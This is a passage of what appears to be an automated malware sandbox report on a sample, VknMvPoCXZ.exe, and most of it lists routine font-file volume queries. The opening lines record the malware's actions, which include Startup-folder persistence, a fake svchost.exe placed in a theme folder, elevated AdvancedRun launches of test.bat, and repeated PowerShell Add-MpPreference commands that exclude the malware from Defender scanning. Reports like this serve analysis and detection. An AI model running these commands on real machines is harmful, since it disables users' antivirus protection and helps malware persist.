                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0c0a829c-b011-4032-9ed5-9caa96b4c6d3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2244 -ip 2244
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2244 -ip 2244
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ce8a02e5-a5a2-4145-9112-744934cbc98c\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe' -Force
Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\b4116074-3d60-4dc8-8710-9dcf62ffe1cd\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe | Code function: 6_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
Source: VknMvPoCXZ.exe, 00000001.00000000.359472382.0000000000F70000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Users\user\Desktop\VknMvPoCXZ.exe VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\VknMvPoCXZ.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
